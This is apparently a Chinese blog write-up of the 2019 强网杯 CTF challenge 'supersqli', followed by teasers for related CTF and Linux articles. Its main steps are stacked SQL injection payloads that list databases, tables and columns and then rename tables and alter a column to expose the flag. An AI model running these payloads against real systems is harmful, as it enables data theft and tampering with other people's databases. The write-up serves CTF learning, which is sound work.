CTF supersqli

news/2024/10/17 22:16:46/

题目来源: 强网杯 2019

题目描述: 随便注

题目场景: http://220.249.52.133:31334 (温馨提示:每次进入URL的端口号都不一样)

1、点击链接进入如下界面

在这里插入图片描述
2、‘1’—>提交

在这里插入图片描述
3、使用union select 爆字段 —>提交
在这里插入图片描述
4、1’;show databases;#—>提交
在这里插入图片描述
5、1’;show tables;#—>提交

在这里插入图片描述
6、1’;show columns from words;#(查询words表中所有列:)—>提交

在这里插入图片描述
7、1’;show columns from 1919810931114514;# —>提交

在这里插入图片描述
8、1’;rename tables words to words1;rename tables 1919810931114514 to words; alter table words change flag id varchar(100);#—>提交

在这里插入图片描述

9、1

在这里插入图片描述


http://www.ppmy.cn/news/462049.html

相关文章

CTF easycap Banmabanma

CTF easycap Banmabanma

文章目录 一、easycap二、Banmabanma 一、easycap 难度系数: ★★ 题目来源: bsidessf-ctf-2017 题目描述: 你能从截取的数据包中得到flag吗? 题目附件: 附件1 1、附件1 链接:https://pan.baidu.com/s/1…
阅读更多...
CTF Broadcast

CTF Broadcast

题目来源: 2019_Redhat 题目描述: 粗心的Alice在制作密码的时候,把明文留下来,聪明的你能快速找出来吗? 题目附件: 附件1 1、 附件1 2、解压后 3、选中“task.py”—>打开 4、可直接找到flag #!/…
阅读更多...
CTF mysql

CTF mysql

难度系数: ★★★★★ 题目来源: XCTF 题目描述: 我们在Mysql数据库中存放了flag,但是黑客已经把它删除了。你能找回来flag吗? 题目场景: 暂无 题目附件: 附件1 1、附件1 链接:htt…
阅读更多...
CTFHub Linux 动态加载器

CTFHub Linux 动态加载器

查看环境 先给了755 他自己传了flag 等于告诉我们在哪了 然后限到了644 不想让我们直接看 都到这一题了权限应该不用讲了 提示给了shell 且不需要提权 于是需要新学一个东西 动态加载 Linux ELF Dynaamic Loader elf文件 elf文件是linux下的可执行文件 文件头为elf 不知道…
阅读更多...
CTFHub Linux 动态加载

CTFHub Linux 动态加载

CTFHub Linux 动态加载 观察页面,写着没有 x权限,说明我们没有办法执行根目录下的 elf 文件 readflag,所以我们无法利用下方的 webshell 获取flag(我们的权限不够) 我们发现无法访问到 flag Linux 下 x(eXecute,执行)…
阅读更多...
程序加载是什么

程序加载是什么

程序加载是什么? 解答:http://www.yayihouse.com/yayishuwu/chapter/1175
阅读更多...
linux服务器风扇功率调整

linux服务器风扇功率调整

为什么要调整功率? 在使用linux服务器跑图像处理任务时,如果不限制风扇功率,经常会导致服务器崩溃。 怎么调整功率? nvidia-smi -pm 1 # 开启GPU的persistent mode nvidia-smi -pl 150 #设置最大功率,根据自己使用机…
阅读更多...
服务器常用的一些硬件信息(不断更新)

服务器常用的一些硬件信息(不断更新)

1、查看额定功率 dmidecode | grep Power 但是有的机器这个命令查不到 2、查看交换空间swap 大小 linux 查看swap大小 free -m (MB) free -g (GB)Unix 查看交换空间大小 lsps -a
阅读更多...
最新文章

Copyright @ 2022~2023